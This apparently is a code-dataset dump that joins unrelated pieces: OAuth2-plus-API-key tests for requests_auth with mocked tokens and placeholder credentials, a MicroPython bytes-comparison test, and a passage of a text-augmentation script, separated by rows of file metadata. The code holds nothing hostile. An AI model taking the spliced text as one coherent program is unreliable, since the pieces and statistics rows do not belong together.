assert response.request.headers.get("X-Api-Key3") == "my_provided_api_key3"
def test_oauth2_resource_owner_password_and_api_key_authentication_can_be_combined(
token_cache, responses: RequestsMock
):
resource_owner_password_auth = requests_auth.OAuth2ResourceOwnerPasswordCredentials(
"http://provide_access_token", username="test_user", password="test_pwd"
)
responses.add(
responses.POST,
"http://provide_access_token",
json={
"access_token": "2YotnFZFEjr1zCsicMWpAA",
"token_type": "example",
"expires_in": 3600,
"refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
"example_parameter": "example_value",
},
)
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
header = get_header(responses, resource_owner_password_auth + api_key_auth)
assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
assert header.get("X-Api-Key") == "my_provided_api_key"
def test_oauth2_resource_owner_password_and_multiple_authentication_can_be_combined(
token_cache, responses: RequestsMock
):
resource_owner_password_auth = requests_auth.OAuth2ResourceOwnerPasswordCredentials(
"http://provide_access_token", username="test_user", password="test_pwd"
)
responses.add(
responses.POST,
"http://provide_access_token",
json={
"access_token": "2YotnFZFEjr1zCsicMWpAA",
"token_type": "example",
"expires_in": 3600,
"refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
"example_parameter": "example_value",
},
)
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
api_key_auth2 = requests_auth.HeaderApiKey(
"my_provided_api_key2", header_name="X-Api-Key2"
)
header = get_header(
responses, resource_owner_password_auth + (api_key_auth + api_key_auth2)
)
assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
assert header.get("X-Api-Key") == "my_provided_api_key"
assert header.get("X-Api-Key2") == "my_provided_api_key2"
def test_oauth2_client_credential_and_api_key_authentication_can_be_combined(
token_cache, responses: RequestsMock
):
resource_owner_password_auth = requests_auth.OAuth2ClientCredentials(
"http://provide_access_token", client_id="test_user", client_secret="test_pwd"
)
responses.add(
responses.POST,
"http://provide_access_token",
json={
"access_token": "2YotnFZFEjr1zCsicMWpAA",
"token_type": "example",
"expires_in": 3600,
"refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
"example_parameter": "example_value",
},
)
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
header = get_header(responses, resource_owner_password_auth + api_key_auth)
assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
assert header.get("X-Api-Key") == "my_provided_api_key"
def test_oauth2_client_credential_and_multiple_authentication_can_be_combined(
token_cache, responses: RequestsMock
):
resource_owner_password_auth = requests_auth.OAuth2ClientCredentials(
"http://provide_access_token", client_id="test_user", client_secret="test_pwd"
)
responses.add(
responses.POST,
"http://provide_access_token",
json={
"access_token": "2YotnFZFEjr1zCsicMWpAA",
"token_type": "example",
"expires_in": 3600,
"refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
"example_parameter": "example_value",
},
)
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
api_key_auth2 = requests_auth.HeaderApiKey(
"my_provided_api_key2", header_name="X-Api-Key2"
)
header = get_header(
responses, resource_owner_password_auth + (api_key_auth + api_key_auth2)
)
assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
assert header.get("X-Api-Key") == "my_provided_api_key"
assert header.get("X-Api-Key2") == "my_provided_api_key2"
def test_oauth2_authorization_code_and_api_key_authentication_can_be_combined(
token_cache, responses: RequestsMock, browser_mock: BrowserMock
):
authorization_code_auth = requests_auth.OAuth2AuthorizationCode(
"http://provide_code", "http://provide_access_token"
)
tab = browser_mock.add_response(
opened_url="http://provide_code?response_type=code&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2F",
reply_url="http://localhost:5000#code=SplxlOBeZQQYbYS6WxSbIA&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de",
)
responses.add(
responses.POST,
"http://provide_access_token",
json={
"access_token": "2YotnFZFEjr1zCsicMWpAA",
"token_type": "example",
"expires_in": 3600,
"refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
"example_parameter": "example_value",
},
)
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
header = get_header(responses, authorization_code_auth + api_key_auth)
assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
assert header.get("X-Api-Key") == "my_provided_api_key"
tab.assert_success(
"You are now authenticated on 163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de. You may close this tab."
)
def test_oauth2_authorization_code_and_multiple_authentication_can_be_combined(
token_cache, responses: RequestsMock, browser_mock: BrowserMock
):
authorization_code_auth = requests_auth.OAuth2AuthorizationCode(
"http://provide_code", "http://provide_access_token"
)
tab = browser_mock.add_response(
opened_url="http://provide_code?response_type=code&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2F",
reply_url="http://localhost:5000#code=SplxlOBeZQQYbYS6WxSbIA&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de",
)
responses.add(
responses.POST,
"http://provide_access_token",
json={
"access_token": "2YotnFZFEjr1zCsicMWpAA",
"token_type": "example",
"expires_in": 3600,
"refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
"example_parameter": "example_value",
},
)
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
api_key_auth2 = requests_auth.HeaderApiKey(
"my_provided_api_key2", header_name="X-Api-Key2"
)
header = get_header(
responses, authorization_code_auth + (api_key_auth + api_key_auth2)
)
assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
assert header.get("X-Api-Key") == "my_provided_api_key"
assert header.get("X-Api-Key2") == "my_provided_api_key2"
tab.assert_success(
"You are now authenticated on 163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de. You may close this tab."
)
def test_oauth2_pkce_and_api_key_authentication_can_be_combined(
token_cache, responses: RequestsMock, browser_mock: BrowserMock, monkeypatch
):
monkeypatch.setattr(requests_auth.authentication.os, "urandom", lambda x: b"1" * 63)
pkce_auth = requests_auth.OAuth2AuthorizationCodePKCE(
"http://provide_code", "http://provide_access_token"
)
tab = browser_mock.add_response(
opened_url="http://provide_code?response_type=code&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2F&code_challenge=5C_ph_KZ3DstYUc965SiqmKAA-ShvKF4Ut7daKd3fjc&code_challenge_method=S256",
reply_url="http://localhost:5000#code=SplxlOBeZQQYbYS6WxSbIA&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de",
)
responses.add(
responses.POST,
"http://provide_access_token",
json={
"access_token": "2YotnFZFEjr1zCsicMWpAA",
"token_type": "example",
"expires_in": 3600,
"refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
"example_parameter": "example_value",
},
)
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
header = get_header(responses, pkce_auth + api_key_auth)
assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
assert header.get("X-Api-Key") == "my_provided_api_key"
tab.assert_success(
"You are now authenticated on 163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de. You may close this tab."
)
def test_oauth2_pkce_and_multiple_authentication_can_be_combined(
token_cache, responses: RequestsMock, browser_mock: BrowserMock, monkeypatch
):
monkeypatch.setattr(requests_auth.authentication.os, "urandom", lambda x: b"1" * 63)
pkce_auth = requests_auth.OAuth2AuthorizationCodePKCE(
"http://provide_code", "http://provide_access_token"
)
tab = browser_mock.add_response(
opened_url="http://provide_code?response_type=code&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2F&code_challenge=5C_ph_KZ3DstYUc965SiqmKAA-ShvKF4Ut7daKd3fjc&code_challenge_method=S256",
reply_url="http://localhost:5000#code=SplxlOBeZQQYbYS6WxSbIA&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de",
)
responses.add(
responses.POST,
"http://provide_access_token",
json={
"access_token": "2YotnFZFEjr1zCsicMWpAA",
"token_type": "example",
"expires_in": 3600,
"refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
"example_parameter": "example_value",
},
)
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
api_key_auth2 = requests_auth.HeaderApiKey(
"my_provided_api_key2", header_name="X-Api-Key2"
)
header = get_header(responses, pkce_auth + (api_key_auth + api_key_auth2))
assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
assert header.get("X-Api-Key") == "my_provided_api_key"
assert header.get("X-Api-Key2") == "my_provided_api_key2"
tab.assert_success(
"You are now authenticated on 163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de. You may close this tab."
)
def test_oauth2_implicit_and_api_key_authentication_can_be_combined(
token_cache, responses: RequestsMock, browser_mock: BrowserMock
):
implicit_auth = requests_auth.OAuth2Implicit("http://provide_token")
expiry_in_1_hour = datetime.datetime.utcnow() + datetime.timedelta(hours=1)
token = create_token(expiry_in_1_hour)
tab = browser_mock.add_response(
opened_url="http://provide_token?response_type=token&state=42a85b271b7a652ca3cc4c398cfd3f01b9ad36bf9c945ba823b023e8f8b95c4638576a0e3dcc96838b838bec33ec6c0ee2609d62ed82480b3b8114ca494c0521&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2F",
reply_url="http://localhost:5000",
data=f"access_token={token}&state=42a85b271b7a652ca3cc4c398cfd3f01b9ad36bf9c945ba823b023e8f8b95c4638576a0e3dcc96838b838bec33ec6c0ee2609d62ed82480b3b8114ca494c0521",
)
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
header = get_header(responses, implicit_auth + api_key_auth)
assert header.get("Authorization") == f"Bearer {token}"
assert header.get("X-Api-Key") == "my_provided_api_key"
tab.assert_success(
"You are now authenticated on 42a85b271b7a652ca3cc4c398cfd3f01b9ad36bf9c945ba823b023e8f8b95c4638576a0e3dcc96838b838bec33ec6c0ee2609d62ed82480b3b8114ca494c0521. You may close this tab."
)
def test_oauth2_implicit_and_multiple_authentication_can_be_combined(
token_cache, responses: RequestsMock, browser_mock: BrowserMock
):
implicit_auth = requests_auth.OAuth2Implicit("http://provide_token")
expiry_in_1_hour = datetime.datetime.utcnow() + datetime.timedelta(hours=1)
token = create_token(expiry_in_1_hour)
tab = browser_mock.add_response(
opened_url="http://provide_token?response_type=token&state=42a85b271b7a652ca3cc4c398cfd3f01b9ad36bf9c945ba823b023e8f8b95c4638576a0e3dcc96838b838bec33ec6c0ee2609d62ed82480b3b8114ca494c0521&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2F",
reply_url="http://localhost:5000",
data=f"access_token={token}&state=42a85b271b7a652ca3cc4c398cfd3f01b9ad36bf9c945ba823b023e8f8b95c4638576a0e3dcc96838b838bec33ec6c0ee2609d62ed82480b3b8114ca494c0521",
)
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
api_key_auth2 = requests_auth.HeaderApiKey(
"my_provided_api_key2", header_name="X-Api-Key2"
)
header = get_header(responses, implicit_auth + (api_key_auth + api_key_auth2))
assert header.get("Authorization") == f"Bearer {token}"
assert header.get("X-Api-Key") == "my_provided_api_key"
assert header.get("X-Api-Key2") == "my_provided_api_key2"
tab.assert_success(
"You are now authenticated on 42a85b271b7a652ca3cc4c398cfd3f01b9ad36bf9c945ba823b023e8f8b95c4638576a0e3dcc96838b838bec33ec6c0ee2609d62ed82480b3b8114ca494c0521. You may close this tab."
)
| 47.339286 | 327 | 0.747265 | 1,999 | 18,557 | 6.544772 | 0.070535 | 0.053199 | 0.061607 | 0.036689 | 0.957579 | 0.956126 | 0.943897 | 0.934877 | 0.933043 | 0.924711 | 0 | 0.115016 | 0.156652 | 18,557 | 391 | 328 | 47.460358 | 0.720958 | 0.006251 | 0 | 0.705382 | 0 | 0.016997 | 0.408309 | 0.093236 | 0 | 0 | 0 | 0 | 0.135977 | 1 | 0.045326 | false | 0.033994 | 0.016997 | 0 | 0.062323 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
292267ba75dfb5bbb4d81de0fbac17ce04e8a8e7 | 920 | py | Python | tests/basics/bytes_compare.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 13,648 | 2015-01-01T01:34:51.000Z | 2022-03-31T16:19:53.000Z | tests/basics/bytes_compare.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 7,092 | 2015-01-01T07:59:11.000Z | 2022-03-31T23:52:18.000Z | tests/basics/bytes_compare.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 4,942 | 2015-01-02T11:48:50.000Z | 2022-03-31T19:57:10.000Z | print(b"" == b"")
print(b"" > b"")
print(b"" < b"")
print(b"" == b"1")
print(b"1" == b"")
print("==")
print(b"" > b"1")
print(b"1" > b"")
print(b"" < b"1")
print(b"1" < b"")
print(b"" >= b"1")
print(b"1" >= b"")
print(b"" <= b"1")
print(b"1" <= b"")
print(b"1" == b"1")
print(b"1" != b"1")
print(b"1" == b"2")
print(b"1" == b"10")
print(b"1" > b"1")
print(b"1" > b"2")
print(b"2" > b"1")
print(b"10" > b"1")
print(b"1/" > b"1")
print(b"1" > b"10")
print(b"1" > b"1/")
print(b"1" < b"1")
print(b"2" < b"1")
print(b"1" < b"2")
print(b"1" < b"10")
print(b"1" < b"1/")
print(b"10" < b"1")
print(b"1/" < b"1")
print(b"1" >= b"1")
print(b"1" >= b"2")
print(b"2" >= b"1")
print(b"10" >= b"1")
print(b"1/" >= b"1")
print(b"1" >= b"10")
print(b"1" >= b"1/")
print(b"1" <= b"1")
print(b"2" <= b"1")
print(b"1" <= b"2")
print(b"1" <= b"10")
print(b"1" <= b"1/")
print(b"10" <= b"1")
print(b"1/" <= b"1")
print(b'o' == b'\n')
| 17.037037 | 20 | 0.447826 | 215 | 920 | 1.916279 | 0.032558 | 0.271845 | 0.492718 | 0.563107 | 0.992718 | 0.992718 | 0.992718 | 0.992718 | 0.992718 | 0.944175 | 0 | 0.107097 | 0.157609 | 920 | 53 | 21 | 17.358491 | 0.424516 | 0 | 0 | 0 | 0 | 0 | 0.104348 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 13 |
2932c1e42a54fd93c3bfbd265bcdd24eadff8c21 | 61,225 | py | Python | code/transformers/src/transformers/data/data_augmentation.py | lingo-mit/transformers | 478fb18a9f9680321f0d37dc999ea444e9287cc0 | [
"Apache-2.0"
] | null | null | null | code/transformers/src/transformers/data/data_augmentation.py | lingo-mit/transformers | 478fb18a9f9680321f0d37dc999ea444e9287cc0 | [
"Apache-2.0"
] | null | null | null | code/transformers/src/transformers/data/data_augmentation.py | lingo-mit/transformers | 478fb18a9f9680321f0d37dc999ea444e9287cc0 | [
"Apache-2.0"
] | null | null | null | import random
import re
import pandas as pd
from scipy.stats import kendalltau
from random import randint
import string
from tqdm import tqdm
from augmentation_utils import *
import nltk
# nltk.download('averaged_perceptron_tagger')
# nltk.download('punkt')
import spacy
nlp = spacy.load("en_core_web_md")
random.seed(42)
# ---------- SHUFFLE WORDS ----------
def shuffle_first_half(tokenized_text, tokenizer, count):
return shuffle_section(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_first_third(tokenized_text, tokenizer, count):
return shuffle_section(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_first_two_thirds(tokenized_text, tokenizer, count):
return shuffle_section(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_section(tokenized_text, tokenizer, section_length, count):
random.seed(42 + count)
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
split_first_part_text = convert_to_tokens(first_part_text, tokenizer)
split_second_part_text = convert_to_tokens(second_part_text, tokenizer)
random.shuffle(split_first_part_text)
return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize("".join(split_first_part_text + ["<|endofaugmentedtext|>", second_part_text]))), tokenizer, shuffle_section)
# ---------- SHUFFLE WORDS & REMOVE POS ----------
def shuffle_remove_all_but_nouns_first_half(tokenized_text, tokenizer, count):
return shuffle_remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, ("NOUN", "PRON", "PROPN"), count)
def shuffle_remove_all_but_nouns_first_third(tokenized_text, tokenizer, count):
return shuffle_remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN"), count)
def shuffle_remove_all_but_nouns_first_two_thirds(tokenized_text, tokenizer, count):
return shuffle_remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN"), count)
def shuffle_remove_all_but_nouns_and_verbs_first_half(tokenized_text, tokenizer, count):
return shuffle_remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, ("NOUN", "PRON", "PROPN", "VERB"), count)
def shuffle_remove_all_but_nouns_and_verbs_first_third(tokenized_text, tokenizer, count):
return shuffle_remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN", "VERB"), count)
def shuffle_remove_all_but_nouns_and_verbs_first_two_thirds(tokenized_text, tokenizer, count):
return shuffle_remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN", "VERB"), count)
def shuffle_remove_all_but_pos(tokenized_text, tokenizer, section_length, pos_list, count):
shuffled_tokenized_text = shuffle_section(tokenized_text, tokenizer, section_length, count)
if shuffled_tokenized_text:
return remove_all_but_pos(shuffled_tokenized_text, tokenizer, section_length, pos_list)
else:
return False
# ---------- REMOVE POS ----------
def remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half(tokenized_text, tokenizer, count):
return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, ("NOUN", "PRON", "PROPN", "VERB", "ADJ", "ADV"))
def remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third(tokenized_text, tokenizer, count):
return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN", "VERB", "ADJ", "ADV"))
def remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds(tokenized_text, tokenizer, count):
return remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN", "VERB", "ADJ", "ADV"))
def remove_all_but_nouns_verbs_and_adjectives_first_half(tokenized_text, tokenizer, count):
return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, ("NOUN", "PRON", "PROPN", "VERB", "ADJ"))
def remove_all_but_nouns_verbs_and_adjectives_first_third(tokenized_text, tokenizer, count):
return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN", "VERB", "ADJ"))
def remove_all_but_nouns_verbs_and_adjectives_first_two_thirds(tokenized_text, tokenizer, count):
return remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN", "VERB", "ADJ"))
def remove_all_but_nouns_and_verbs_first_half(tokenized_text, tokenizer, count):
return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, ("NOUN", "PRON", "PROPN", "VERB"))
def remove_all_but_nouns_and_verbs_first_third(tokenized_text, tokenizer, count):
return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN", "VERB"))
def remove_all_but_nouns_and_verbs_first_two_thirds(tokenized_text, tokenizer, count):
return remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN", "VERB"))
def remove_all_but_nouns_first_half(tokenized_text, tokenizer, count):
return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, ("NOUN", "PRON", "PROPN"))
def remove_all_but_nouns_first_third(tokenized_text, tokenizer, count):
return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN"))
def remove_all_but_nouns_first_two_thirds(tokenized_text, tokenizer, count):
return remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN"))
def remove_all_but_pos(tokenized_text, tokenizer, section_length, pos_list):
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
nlp_first_part_text = nlp(first_part_text)
first_part_text_list = []
for token in nlp_first_part_text:
if token.pos_ in pos_list:
first_part_text_list.append(token.text)
first_part_text = " ".join(first_part_text_list)
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(first_part_text + "<|endofaugmentedtext|>" + second_part_text)), tokenizer, remove_all_but_pos)
# ---------- REMOVE POS AND FILL ----------
def remove_all_but_nouns_and_verbs_fill_first_half(tokenized_text, tokenizer, count):
return remove_all_but_pos_fill(tokenized_text, tokenizer, 512, ("NOUN", "PRON", "PROPN", "VERB"), 1024)
def remove_all_but_nouns_and_verbs_fill_first_third(tokenized_text, tokenizer, count):
return remove_all_but_pos_fill(tokenized_text, tokenizer, 1024, ("NOUN", "PRON", "PROPN", "VERB"), 1536)
def remove_all_but_nouns_and_verbs_fill_first_two_thirds(tokenized_text, tokenizer, count):
return remove_all_but_pos_fill(tokenized_text, tokenizer, 512, ("NOUN", "PRON", "PROPN", "VERB"), 1536)
def remove_all_but_pos_fill(tokenized_text, tokenizer, section_length, pos_list, size):
first_part_tokens, second_part_tokens = divide_into_sections_fill(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
nlp_first_part_text = nlp(first_part_text)
first_part_text_list = []
for token in nlp_first_part_text:
if token.pos_ in pos_list:
first_part_text_list.append(token.text)
first_part_text = " ".join(first_part_text_list)
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(first_part_text + "<|endofaugmentedtext|>" + second_part_text)), tokenizer, remove_all_but_pos_fill, size)
# ---------- SHUFFLE SENTENCES ----------
def shuffle_sentences_first_half(tokenized_text, tokenizer, count):
return shuffle_sentences(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_sentences_first_third(tokenized_text, tokenizer, count):
return shuffle_sentences(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_sentences_first_two_thirds(tokenized_text, tokenizer, count):
return shuffle_sentences(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_sentences(tokenized_text, tokenizer, section_length, count):
random.seed(42 + count)
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
first_part_sentences = convert_to_sentences(first_part_text, tokenizer)
random.shuffle(first_part_sentences)
return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize("".join(first_part_sentences + ["<|endofaugmentedtext|>", second_part_text]))), tokenizer, shuffle_sentences)
# ---------- SHUFFLE WITHIN SENTENCES ----------
def shuffle_within_sentences_first_half(tokenized_text, tokenizer, count):
return shuffle_within_sentences(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_within_sentences_first_third(tokenized_text, tokenizer, count):
return shuffle_within_sentences(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_within_sentences_first_two_thirds(tokenized_text, tokenizer, count):
return shuffle_within_sentences(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_within_sentences(tokenized_text, tokenizer, section_length, count):
random.seed(42 + count)
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
first_part_sentences = convert_to_sentences(first_part_text, tokenizer)
first_part_shuffled_sentences = []
for sentence in first_part_sentences:
if not sentence:
continue
split_sentence = convert_to_tokens(sentence, tokenizer)
random.shuffle(split_sentence)
first_part_shuffled_sentences.append("".join(split_sentence))
return check_tokenization(tokenized_text,
tokenizer.convert_tokens_to_ids(tokenizer.tokenize("".join(first_part_shuffled_sentences + ["<|endofaugmentedtext|>", second_part_text]))), tokenizer, shuffle_within_sentences)
# ---------- SHUFFLE WITHIN SENTENCES LOW PMI ----------
def shuffle_within_sentences_low_pmi_first_half(tokenized_text, tokenizer, count):
return shuffle_within_sentences_low_pmi(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_within_sentences_low_pmi_first_third(tokenized_text, tokenizer, count):
return shuffle_within_sentences_low_pmi(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_within_sentences_low_pmi_first_two_thirds(tokenized_text, tokenizer, count):
return shuffle_within_sentences_low_pmi(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_within_sentences_low_pmi(tokenized_text, tokenizer, section_length, count):
random.seed(42 + count)
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
first_part_sentences = convert_to_sentences(first_part_text, tokenizer)
first_part_low_pmi_sentences = create_lowpmi(first_part_sentences, tokenizer)
return check_tokenization(tokenized_text,
tokenizer.convert_tokens_to_ids(tokenizer.tokenize("".join(first_part_low_pmi_sentences + ["<|endofaugmentedtext|>", second_part_text]))),
tokenizer, shuffle_within_sentences_low_pmi)
# ---------- SHUFFLE WITHIN SENTENCES HIGH PMI ----------
def shuffle_within_sentences_high_pmi_first_half(tokenized_text, tokenizer, count):
return shuffle_within_sentences_high_pmi(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_within_sentences_high_pmi_first_third(tokenized_text, tokenizer, count):
return shuffle_within_sentences_high_pmi(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_within_sentences_high_pmi_first_two_thirds(tokenized_text, tokenizer, count):
return shuffle_within_sentences_high_pmi(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_within_sentences_high_pmi(tokenized_text, tokenizer, section_length, count):
random.seed(42 + count)
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
first_part_sentences = convert_to_sentences(first_part_text, tokenizer)
first_part_high_pmi_sentences = create_highpmi(first_part_sentences, tokenizer, count)
return check_tokenization(tokenized_text,
tokenizer.convert_tokens_to_ids(tokenizer.tokenize("".join(first_part_high_pmi_sentences + ["<|endofaugmentedtext|>", second_part_text]))),
tokenizer, shuffle_within_sentences_high_pmi)
# ---------- SHUFFLE WITHIN TRIGRAMS ----------
